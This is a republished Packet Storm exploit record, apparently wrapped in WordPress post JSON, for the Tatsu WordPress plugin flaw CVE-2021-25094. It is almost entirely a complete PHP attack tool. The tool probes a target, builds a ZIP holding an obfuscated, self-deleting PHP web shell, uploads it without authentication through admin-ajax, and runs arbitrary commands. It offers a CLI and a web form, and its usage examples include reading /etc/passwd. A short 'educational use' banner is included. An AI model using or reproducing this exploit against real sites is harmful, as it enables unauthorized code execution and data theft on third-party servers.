{“lastseen”:”2026-02-06T18:45:49″,”description”:”WordPress Tatsu plugin version 3.3.11 proof of concept unauthenticated remote shell upload exploit…”,”published”:”2026-02-06T00:00:00″,”modified”:”2026-02-06T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 WordPress Tatsu 3.3.11 Shell Upload”,”source”:””,”references”:””,”id”:”PACKETSTORM:215075″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2021-25094″],”sourceData”:”=============================================================================================================================================\\n | # Title : WordPress Tatsu 3.3.11 Plugin Unauthenticated File Upload |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.1 (64 bits) |\\n | # Vendor : https:\/\/tatsubuilder.com\/ |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/190566\/ \\u0026 \\tCVE-2021-25094\\n \\n [+] Summary : \\n Critical unauthenticated remote code execution vulnerability in Tatsu WordPress Plugin (versions 3.3.11) \\n \\t\\t\\t allowing attackers to upload and execute arbitrary PHP code through malicious ZIP file uploads without any authentication.\\n \\t\\t\\t \\n [+] POC : \\n \\n php poc.php or http:\/\/127.0.0.1\/poc.php \\n \\n \\u003c?php\\n \/*\\n * Tatsu WordPress Plugin Pre-Auth RCE Exploit\\n * CVE-2021-25094\\n * by indoushka\\n * PHP Implementation based on Python exploit\\n *\/\\n \\n class TatsuRCEExploit {\\n private $target;\\n private $port;\\n private $ssl;\\n private $base_path;\\n private $timeout;\\n private $headers;\\n private $zip_name;\\n private $shell_filename;\\n \\n public function __construct($target, $port = 80, $ssl = false, $base_path = ‘\/’) {\\n $this-\\u003etarget = $target;\\n $this-\\u003eport = $port;\\n $this-\\u003essl = $ssl;\\n $this-\\u003ebase_path = rtrim($base_path, ‘\/’);\\n $this-\\u003etimeout = 30;\\n $this-\\u003eheaders = [\\n ‘X-Requested-With: XMLHttpRequest’,\\n ‘User-Agent: Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/90.0.4430.212 Safari\/537.36’,\\n ‘Accept: *\/*’,\\n ‘Accept-Language: en-US,en;q=0.9’\\n ];\\n }\\n \\n \/**\\n * Check if target is vulnerable\\n *\/\\n public function check() {\\n echo \\”[*] Checking Tatsu WordPress Plugin vulnerability…\\\\n\\”;\\n \\n \/\/ Check if WordPress is accessible\\n $res = $this-\\u003esend_request(‘\/’);\\n if (!$res || $res[‘code’] != 200) {\\n echo \\”[-] Cannot access WordPress site\\\\n\\”;\\n return \\”unknown\\”;\\n }\\n \\n \/\/ Check Tatsu plugin\\n $res = $this-\\u003esend_request(‘\/wp-content\/plugins\/tatsu\/’);\\n if ($res \\u0026\\u0026 $res[‘code’] == 200) {\\n echo \\”[+] Tatsu plugin detected\\\\n\\”;\\n \\n \/\/ Try to check version from changelog\\n $version = $this-\\u003echeck_version();\\n if ($version \\u0026\\u0026 $this-\\u003eis_version_vulnerable($version)) {\\n echo \\”[+] \u2713 Tatsu version $version is vulnerable\\\\n\\”;\\n return \\”vulnerable\\”;\\n } else {\\n echo \\”[+] Tatsu plugin found (version check failed)\\\\n\\”;\\n return \\”likely_vulnerable\\”;\\n }\\n }\\n \\n echo \\”[-] Tatsu plugin not found\\\\n\\”;\\n return \\”safe\\”;\\n }\\n \\n \/**\\n * Check Tatsu version\\n *\/\\n private function check_version() {\\n $res = $this-\\u003esend_request(‘\/wp-content\/plugins\/tatsu\/changelog.md’);\\n if ($res \\u0026\\u0026 $res[‘code’] == 200) {\\n if (preg_match(‘\/v?(\\\\d+\\\\.\\\\d+\\\\.\\\\d+)\/’, $res[‘body’], $matches)) {\\n return $matches[1];\\n }\\n }\\n return null;\\n }\\n \\n \/**\\n * Check if version is vulnerable\\n *\/\\n private function is_version_vulnerable($version) {\\n return version_compare($version, ‘3.3.11’, ‘\\u003c=’);\\n }\\n \\n \/**\\n * Generate malicious ZIP file\\n *\/\\n private function generate_zip($technique = ‘php’, $custom_shell = null, $keep = false) {\\n echo \\”[*] Generating malicious ZIP file…\\\\n\\”;\\n \\n $zip = new ZipArchive();\\n $zip_filename = tempnam(sys_get_temp_dir(), ‘tatsu_’) . ‘.zip’;\\n \\n if ($zip-\\u003eopen($zip_filename, ZipArchive::CREATE) !== TRUE) {\\n return false;\\n }\\n \\n $this-\\u003ezip_name = $this-\\u003erandom_string(3);\\n $this-\\u003eshell_filename = ‘.’ . $this-\\u003erandom_string(5);\\n \\n switch ($technique) {\\n case ‘php’:\\n $shell_content = $this-\\u003egenerate_php_shell($keep);\\n $this-\\u003eshell_filename .= ‘.php’;\\n break;\\n \\n case ‘htaccess’:\\n $shell_content = $this-\\u003egenerate_htaccess_shell($keep);\\n $this-\\u003eshell_filename .= ‘.png’;\\n break;\\n \\n case ‘custom’:\\n if ($custom_shell \\u0026\\u0026 file_exists($custom_shell)) {\\n $shell_content = file_get_contents($custom_shell);\\n $this-\\u003eshell_filename = ‘.’ . basename($custom_shell);\\n } else {\\n echo \\”[-] Custom shell file not found\\\\n\\”;\\n return false;\\n }\\n break;\\n \\n default:\\n echo \\”[-] Unknown technique: $technique\\\\n\\”;\\n return false;\\n }\\n \\n if ($technique == ‘htaccess’) {\\n $zip-\\u003eaddFromString(‘.htaccess’, \\”AddType application\/x-httpd-php .png\\\\n\\”);\\n }\\n \\n $zip-\\u003eaddFromString($this-\\u003eshell_filename, $shell_content);\\n $zip-\\u003eclose();\\n \\n $zip_content = file_get_contents($zip_filename);\\n unlink($zip_filename);\\n \\n return $zip_content;\\n }\\n \\n \/**\\n * Generate PHP shell\\n *\/\\n private function generate_php_shell($keep = false) {\\n $shell = ‘\\u003c?php ‘;\\n $shell .= ‘$f = \\”lmeyst\\”;’;\\n $shell .= ‘@$a= $f[4].$f[3].$f[4].$f[5].$f[2].$f[1];’;\\n $shell .= ‘@$words = array(base64_decode($_POST[\\\\’text\\\\’]));’;\\n $shell .= ‘$j=\\”array\\”.\\”_\\”.\\”filter\\”;’;\\n $shell .= ‘@$filtered_words = $j($words, $a);’;\\n if (!$keep) {\\n $shell .= ‘@unlink(__FILE__);’;\\n }\\n $shell .= ‘?\\u003e’;\\n \\n return $shell;\\n }\\n \\n \/**\\n * Generate .htaccess + PHP shell\\n *\/\\n private function generate_htaccess_shell($keep = false) {\\n $shell = ‘\\u003c?php ‘;\\n $shell .= ‘$f = \\”lmeyst\\”;’;\\n $shell .= ‘@$a= $f[4].$f[3].$f[4].$f[5].$f[2].$f[1];’;\\n $shell .= ‘@$words = array(base64_decode($_POST[\\\\’text\\\\’]));’;\\n $shell .= ‘$j=\\”array\\”.\\”_\\”.\\”filter\\”;’;\\n $shell .= ‘@$filtered_words = $j($words, $a);’;\\n if (!$keep) {\\n $shell .= ‘@unlink(\\\\’.\\\\’+\\\\’h\\\\’+\\\\’t\\\\’+\\\\’a\\\\’+\\\\’cc\\\\’+\\\\’e\\\\’+\\\\’ss\\\\’);’;\\n $shell .= ‘@unlink(__FILE__);’;\\n }\\n $shell .= ‘?\\u003e’;\\n \\n return $shell;\\n }\\n \\n \/**\\n * Upload malicious ZIP\\n *\/\\n private function upload_zip($zip_content) {\\n echo \\”[*] Uploading malicious ZIP file…\\\\n\\”;\\n \\n $boundary = ‘—-WebKitFormBoundary’ . $this-\\u003erandom_string(16);\\n \\n $data = \\”–{$boundary}\\\\r\\\\n\\”;\\n $data .= \\”Content-Disposition: form-data; name=\\\\\\”action\\\\\\”\\\\r\\\\n\\\\r\\\\n\\”;\\n $data .= \\”add_custom_font\\\\r\\\\n\\”;\\n $data .= \\”–{$boundary}\\\\r\\\\n\\”;\\n $data .= \\”Content-Disposition: form-data; name=\\\\\\”file\\\\\\”; filename=\\\\\\”{$this-\\u003ezip_name}.zip\\\\\\”\\\\r\\\\n\\”;\\n $data .= \\”Content-Type: application\/zip\\\\r\\\\n\\\\r\\\\n\\”;\\n $data .= $zip_content . \\”\\\\r\\\\n\\”;\\n $data .= \\”–{$boundary}–\\\\r\\\\n\\”;\\n \\n $headers = array_merge($this-\\u003eheaders, [\\n \\”Content-Type: multipart\/form-data; boundary={$boundary}\\”,\\n \\”Content-Length: \\” . strlen($data)\\n ]);\\n \\n $res = $this-\\u003esend_request(‘\/wp-admin\/admin-ajax.php’, ‘POST’, [], $data, $headers);\\n \\n if ($res \\u0026\\u0026 $res[‘code’] == 200) {\\n $json = json_decode($res[‘body’], true);\\n if ($json \\u0026\\u0026 isset($json[‘status’]) \\u0026\\u0026 $json[‘status’] == ‘success’) {\\n echo \\”[+] ZIP file uploaded successfully\\\\n\\”;\\n if (isset($json[‘name’])) {\\n $this-\\u003ezip_name = $json[‘name’];\\n }\\n return true;\\n }\\n }\\n \\n echo \\”[-] ZIP upload failed\\\\n\\”;\\n if ($res) {\\n echo \\”[-] HTTP {$res[‘code’]}: {$res[‘body’]}\\\\n\\”;\\n }\\n return false;\\n }\\n \\n \/**\\n * Execute command via uploaded shell\\n *\/\\n public function execute_command($command, $technique = ‘php’, $custom_shell = null, $keep = false) {\\n echo \\”[*] Executing command: $command\\\\n\\”;\\n \\n \/\/ Generate and upload ZIP\\n $zip_content = $this-\\u003egenerate_zip($technique, $custom_shell, $keep);\\n if (!$zip_content) {\\n echo \\”[-] Failed to generate ZIP file\\\\n\\”;\\n return false;\\n }\\n \\n if (!$this-\\u003eupload_zip($zip_content)) {\\n return false;\\n }\\n \\n \/\/ Build shell URL\\n $shell_url = \\”\/wp-content\/uploads\/typehub\/custom\/{$this-\\u003ezip_name}\/{$this-\\u003eshell_filename}\\”;\\n echo \\”[+] Shell URL: {$this-\\u003ebuild_url($shell_url)}\\\\n\\”;\\n \\n \/\/ Execute command\\n $encoded_cmd = base64_encode($command);\\n $post_data = \\”text={$encoded_cmd}\\”;\\n \\n $headers = array_merge($this-\\u003eheaders, [\\n ‘Content-Type: application\/x-www-form-urlencoded’,\\n ‘Content-Length: ‘ . strlen($post_data)\\n ]);\\n \\n $res = $this-\\u003esend_request($shell_url, ‘POST’, [], $post_data, $headers);\\n \\n if ($res \\u0026\\u0026 $res[‘code’] == 200) {\\n echo \\”[+] Command executed successfully\\\\n\\”;\\n echo \\”[+] Output:\\\\n{$res[‘body’]}\\\\n\\”;\\n return true;\\n } else {\\n echo \\”[-] Command execution failed\\\\n\\”;\\n if ($res) {\\n echo \\”[-] HTTP {$res[‘code’]}\\\\n\\”;\\n }\\n return false;\\n }\\n }\\n \\n \/**\\n * Full exploitation\\n *\/\\n public function exploit($command = ‘whoami’, $technique = ‘php’, $custom_shell = null, $keep = false) {\\n echo \\”[*] Starting Tatsu WordPress Plugin exploitation…\\\\n\\”;\\n \\n \/\/ Check vulnerability first\\n $status = $this-\\u003echeck();\\n if ($status !== \\”vulnerable\\” \\u0026\\u0026 $status !== \\”likely_vulnerable\\”) {\\n echo \\”[-] Target does not appear to be vulnerable\\\\n\\”;\\n return false;\\n }\\n \\n echo \\”[*] Target appears vulnerable, proceeding with exploitation…\\\\n\\”;\\n \\n if ($this-\\u003eexecute_command($command, $technique, $custom_shell, $keep)) {\\n echo \\”[+] \u2713 Exploitation completed successfully\\\\n\\”;\\n return true;\\n } else {\\n echo \\”[-] Exploitation failed\\\\n\\”;\\n return false;\\n }\\n }\\n \\n \/**\\n * Send HTTP request\\n *\/\\n private function send_request($path, $method = ‘GET’, $params = [], $data = null, $custom_headers = []) {\\n $url = $this-\\u003ebuild_url($path);\\n \\n if ($method == ‘GET’ \\u0026\\u0026 !empty($params)) {\\n $url .= ‘?’ . http_build_query($params);\\n }\\n \\n $ch = curl_init();\\n curl_setopt_array($ch, [\\n CURLOPT_URL =\\u003e $url,\\n CURLOPT_RETURNTRANSFER =\\u003e true,\\n CURLOPT_TIMEOUT =\\u003e $this-\\u003etimeout,\\n CURLOPT_SSL_VERIFYPEER =\\u003e false,\\n CURLOPT_SSL_VERIFYHOST =\\u003e false,\\n CURLOPT_CUSTOMREQUEST =\\u003e $method,\\n CURLOPT_FOLLOWLOCATION =\\u003e false,\\n CURLOPT_HEADER =\\u003e false\\n ]);\\n \\n \/\/ Add POST data if provided\\n if ($method == ‘POST’ \\u0026\\u0026 $data) {\\n curl_setopt($ch, CURLOPT_POSTFIELDS, $data);\\n }\\n \\n \/\/ Build headers\\n $headers = array_merge($this-\\u003eheaders, $custom_headers);\\n curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);\\n \\n $response = curl_exec($ch);\\n $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);\\n curl_close($ch);\\n \\n if ($response !== false) {\\n return [\\n ‘code’ =\\u003e $http_code,\\n ‘body’ =\\u003e $response\\n ];\\n }\\n \\n return false;\\n }\\n \\n \/**\\n * Generate random string\\n *\/\\n private function random_string($length = 8) {\\n $chars = ‘abcdefghijklmnopqrstuvwxyz’;\\n $result = ”;\\n for ($i = 0; $i \\u003c $length; $i++) {\\n $result .= $chars[rand(0, strlen($chars) – 1)];\\n }\\n return $result;\\n }\\n \\n \/**\\n * Build full URL\\n *\/\\n private function build_url($path) {\\n $protocol = $this-\\u003essl ? ‘https’ : ‘http’;\\n $full_path = $this-\\u003ebase_path . $path;\\n return \\”{$protocol}:\/\/{$this-\\u003etarget}:{$this-\\u003eport}{$full_path}\\”;\\n }\\n }\\n \\n \/\/ CLI Interface\\n if (php_sapi_name() === ‘cli’) {\\n echo \\”\\n \u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\\n \u2551 Tatsu WordPress Plugin RCE \u2551\\n \u2551 CVE-2021-25094 \u2551\\n \u2551 PHP Implementation \u2551\\n \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\\n \\n \\\\n\\”;\\n \\n $options = getopt(\\”t:p:s:u:cC:T:k\\”, [\\n \\”target:\\”,\\n \\”port:\\”,\\n \\”ssl\\”,\\n \\”uri:\\”,\\n \\”check\\”,\\n \\”command:\\”,\\n \\”technique:\\”,\\n \\”custom-shell:\\”,\\n \\”keep\\”\\n ]);\\n \\n $target = $options[‘t’] ?? $options[‘target’] ?? null;\\n $port = $options[‘p’] ?? $options[‘port’] ?? 80;\\n $ssl = isset($options[‘s’]) || isset($options[‘ssl’]);\\n $base_uri = $options[‘u’] ?? $options[‘uri’] ?? ‘\/’;\\n $check_only = isset($options[‘c’]) || isset($options[‘check’]);\\n $command = $options[‘C’] ?? $options[‘command’] ?? ‘whoami’;\\n $technique = $options[‘T’] ?? $options[‘technique’] ?? ‘php’;\\n $custom_shell = $options[‘custom-shell’] ?? null;\\n $keep = isset($options[‘k’]) || isset($options[‘keep’]);\\n \\n if (!$target) {\\n echo \\”Usage: php tatsu_exploit.php [options]\\\\n\\”;\\n echo \\”Options:\\\\n\\”;\\n echo \\” -t, –target Target host (required)\\\\n\\”;\\n echo \\” -p, –port Target port (default: 80)\\\\n\\”;\\n echo \\” -s, –ssl Use SSL (default: false)\\\\n\\”;\\n echo \\” -u, –uri Base URI path (default: \/)\\\\n\\”;\\n echo \\” -c, –check Check only (don’t exploit)\\\\n\\”;\\n echo \\” -C, –command Command to execute (default: whoami)\\\\n\\”;\\n echo \\” -T, –technique Shell technique: php, htaccess, custom (default: php)\\\\n\\”;\\n echo \\” –custom-shell Custom shell file path (for custom technique)\\\\n\\”;\\n echo \\” -k, –keep Keep shell file after execution\\\\n\\”;\\n echo \\”\\\\nExamples:\\\\n\\”;\\n echo \\” php tatsu_exploit.php -t wordpress.example.com -c\\\\n\\”;\\n echo \\” php tatsu_exploit.php -t 192.168.1.100 -C ‘id; uname -a’\\\\n\\”;\\n echo \\” php tatsu_exploit.php -t site.com -T htaccess -C ‘cat \/etc\/passwd’\\\\n\\”;\\n exit(1);\\n }\\n \\n $exploit = new TatsuRCEExploit($target, $port, $ssl, $base_uri);\\n \\n if ($check_only) {\\n $result = $exploit-\\u003echeck();\\n echo \\”\\\\n[*] Result: {$result}\\\\n\\”;\\n } else {\\n if ($exploit-\\u003eexploit($command, $technique, $custom_shell, $keep)) {\\n echo \\”[+] Exploitation completed successfully\\\\n\\”;\\n } else {\\n echo \\”[-] Exploitation failed\\\\n\\”;\\n }\\n }\\n \\n } else {\\n \/\/ Web Interface\\n $action = $_POST[‘action’] ?? ”;\\n \\n if ($action === ‘check’ || $action === ‘exploit’) {\\n $target = $_POST[‘target’] ?? ”;\\n $port = $_POST[‘port’] ?? 80;\\n $ssl = isset($_POST[‘ssl’]);\\n $base_uri = $_POST[‘uri’] ?? ‘\/’;\\n $command = $_POST[‘command’] ?? ‘whoami’;\\n $technique = $_POST[‘technique’] ?? ‘php’;\\n $keep = isset($_POST[‘keep’]);\\n \\n if (empty($target)) {\\n echo \\”\\u003cdiv style=’color: red; padding: 10px; border: 1px solid red; margin: 10px;’\\u003eTarget host is required\\u003c\/div\\u003e\\”;\\n } else {\\n $exploit = new TatsuRCEExploit($target, $port, $ssl, $base_uri);\\n \\n ob_start();\\n if ($action === ‘check’) {\\n $exploit-\\u003echeck();\\n } else {\\n $exploit-\\u003eexploit($command, $technique, null, $keep);\\n }\\n $output = ob_get_clean();\\n \\n echo \\”\\u003cpre style=’background: #f4f4f4; padding: 15px; border: 1px solid #ddd; border-radius: 4px;’\\u003e$output\\u003c\/pre\\u003e\\”;\\n }\\n \\n echo ‘\\u003ca href=\\”‘ . htmlspecialchars($_SERVER[‘PHP_SELF’]) . ‘\\” style=\\”display: inline-block; padding: 10px 20px; background: #007cba; color: white; text-decoration: none; border-radius: 4px; margin: 10px 0;\\”\\u003eBack to Form\\u003c\/a\\u003e’;\\n \\n } else {\\n \/\/ Display the form\\n echo ‘\\u003c!DOCTYPE html\\u003e\\n \\u003chtml\\u003e\\n \\u003chead\\u003e\\n \\u003ctitle\\u003eTatsu WordPress Plugin RCE – CVE-2021-25094\\u003c\/title\\u003e\\n \\u003cmeta charset=\\”UTF-8\\”\\u003e\\n \\u003cstyle\\u003e\\n body { \\n font-family: Arial, sans-serif; \\n margin: 0; \\n padding: 20px; \\n background: #f5f5f5;\\n }\\n .container { \\n max-width: 800px; \\n margin: 0 auto; \\n background: white;\\n padding: 30px;\\n border-radius: 8px;\\n box-shadow: 0 2px 10px rgba(0,0,0,0.1);\\n }\\n h1 { \\n color: #333; \\n border-bottom: 2px solid #007cba;\\n padding-bottom: 10px;\\n }\\n .form-group { \\n margin-bottom: 20px; \\n }\\n label { \\n display: block; \\n margin-bottom: 8px; \\n font-weight: bold;\\n color: #333;\\n }\\n input[type=\\”text\\”], select { \\n width: 100%; \\n padding: 10px; \\n border: 1px solid #ddd; \\n border-radius: 4px; \\n box-sizing: border-box;\\n font-size: 14px;\\n }\\n .checkbox-group {\\n display: flex;\\n align-items: center;\\n gap: 10px;\\n }\\n button { \\n background: #007cba; \\n color: white; \\n padding: 12px 25px; \\n border: none; \\n border-radius: 4px; \\n cursor: pointer; \\n margin-right: 10px;\\n font-size: 16px;\\n }\\n .danger { \\n background: #dc3545; \\n }\\n .info { \\n background: #17a2b8; \\n }\\n .warning-box {\\n background: #fff3cd;\\n border: 1px solid #ffeaa7;\\n color: #856404;\\n padding: 15px;\\n border-radius: 4px;\\n margin: 20px 0;\\n }\\n .info-box {\\n background: #d1ecf1;\\n border: 1px solid #bee5eb;\\n color: #0c5460;\\n padding: 15px;\\n border-radius: 4px;\\n margin: 20px 0;\\n }\\n \\u003c\/style\\u003e\\n \\u003c\/head\\u003e\\n \\u003cbody\\u003e\\n \\u003cdiv class=\\”container\\”\\u003e\\n \\u003ch1\\u003eTatsu WordPress Plugin RCE\\u003c\/h1\\u003e\\n \\u003ch3\\u003eCVE-2021-25094 – Unauthenticated Remote Code Execution\\u003c\/h3\\u003e\\n \\n \\u003cdiv class=\\”warning-box\\”\\u003e\\n \\u003cstrong\\u003e\u26a0\ufe0f Educational Use Only:\\u003c\/strong\\u003e This tool demonstrates a critical vulnerability in Tatsu WordPress Plugin.\\n Use only on systems you own or have explicit permission to test.\\n \\u003c\/div\\u003e\\n \\n \\u003cform method=\\”post\\”\\u003e\\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003clabel for=\\”target\\”\\u003eTarget Host:\\u003c\/label\\u003e\\n \\u003cinput type=\\”text\\” id=\\”target\\” name=\\”target\\” placeholder=\\”wordpress.example.com\\” required\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003clabel for=\\”port\\”\\u003ePort:\\u003c\/label\\u003e\\n \\u003cinput type=\\”text\\” id=\\”port\\” name=\\”port\\” value=\\”80\\”\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003clabel for=\\”uri\\”\\u003eBase URI:\\u003c\/label\\u003e\\n \\u003cinput type=\\”text\\” id=\\”uri\\” name=\\”uri\\” value=\\”\/\\”\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003cdiv class=\\”checkbox-group\\”\\u003e\\n \\u003cinput type=\\”checkbox\\” id=\\”ssl\\” name=\\”ssl\\”\\u003e\\n \\u003clabel for=\\”ssl\\” style=\\”display: inline; font-weight: normal;\\”\\u003eUse SSL\\u003c\/label\\u003e\\n \\u003c\/div\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003clabel for=\\”command\\”\\u003eCommand to Execute:\\u003c\/label\\u003e\\n \\u003cinput type=\\”text\\” id=\\”command\\” name=\\”command\\” value=\\”whoami\\”\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003clabel for=\\”technique\\”\\u003eShell Technique:\\u003c\/label\\u003e\\n \\u003cselect id=\\”technique\\” name=\\”technique\\”\\u003e\\n \\u003coption value=\\”php\\”\\u003ePHP Shell\\u003c\/option\\u003e\\n \\u003coption value=\\”htaccess\\”\\u003e.htaccess + PHP\\u003c\/option\\u003e\\n \\u003c\/select\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003cdiv class=\\”checkbox-group\\”\\u003e\\n \\u003cinput type=\\”checkbox\\” id=\\”keep\\” name=\\”keep\\”\\u003e\\n \\u003clabel for=\\”keep\\” style=\\”display: inline; font-weight: normal;\\”\\u003eKeep shell file\\u003c\/label\\u003e\\n \\u003c\/div\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cbutton type=\\”submit\\” name=\\”action\\” value=\\”check\\” class=\\”info\\”\\u003eCheck Vulnerability\\u003c\/button\\u003e\\n \\u003cbutton type=\\”submit\\” name=\\”action\\” value=\\”exploit\\” class=\\”danger\\”\\u003eExecute Exploit\\u003c\/button\\u003e\\n \\u003c\/form\\u003e\\n \\n \\u003cdiv class=\\”info-box\\”\\u003e\\n \\u003ch3\\u003eAbout CVE-2021-25094:\\u003c\/h3\\u003e\\n \\u003cp\\u003e\\u003cstrong\\u003eVulnerability:\\u003c\/strong\\u003e Unauthenticated file upload leading to RCE\\u003c\/p\\u003e\\n \\u003cp\\u003e\\u003cstrong\\u003eAffected Versions:\\u003c\/strong\\u003e Tatsu Plugin \u2264 3.3.11\\u003c\/p\\u003e\\n \\u003cp\\u003e\\u003cstrong\\u003eAuthentication:\\u003c\/strong\\u003e None required\\u003c\/p\\u003e\\n \\u003cp\\u003e\\u003cstrong\\u003eEndpoint:\\u003c\/strong\\u003e \/wp-admin\/admin-ajax.php\\u003c\/p\\u003e\\n \\u003cp\\u003e\\u003cstrong\\u003eAction:\\u003c\/strong\\u003e add_custom_font\\u003c\/p\\u003e\\n \\u003cp\\u003e\\u003cstrong\\u003eImpact:\\u003c\/strong\\u003e Remote Code Execution via ZIP file upload\\u003c\/p\\u003e\\n \\u003cp\\u003e\\u003cstrong\\u003eExploit Chain:\\u003c\/strong\\u003e ZIP Upload \u2192 File Extraction \u2192 PHP Execution\\u003c\/p\\u003e\\n \\u003c\/div\\u003e\\n \\u003c\/div\\u003e\\n \\u003c\/body\\u003e\\n \\u003c\/html\\u003e’;\\n }\\n }\\n ?\\u003e\\n \\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/215075″,”cvss”:{“score”:8.1,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:N\/AC:H\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/215075\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-02-06T18:45:49″,”description”:”WordPress Tatsu plugin version 3.3.11 proof of concept unauthenticated remote shell upload exploit…”,”published”:”2026-02-06T00:00:00″,”modified”:”2026-02-06T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 WordPress Tatsu 3.3.11 Shell Upload”,”source”:””,”references”:””,”id”:”PACKETSTORM:215075″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2021-25094″],”sourceData”:”=============================================================================================================================================\\n | # Title : WordPress Tatsu 3.3.11…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,52,12,15,13,53,7,11,5],"class_list":["post-39475","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-81","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n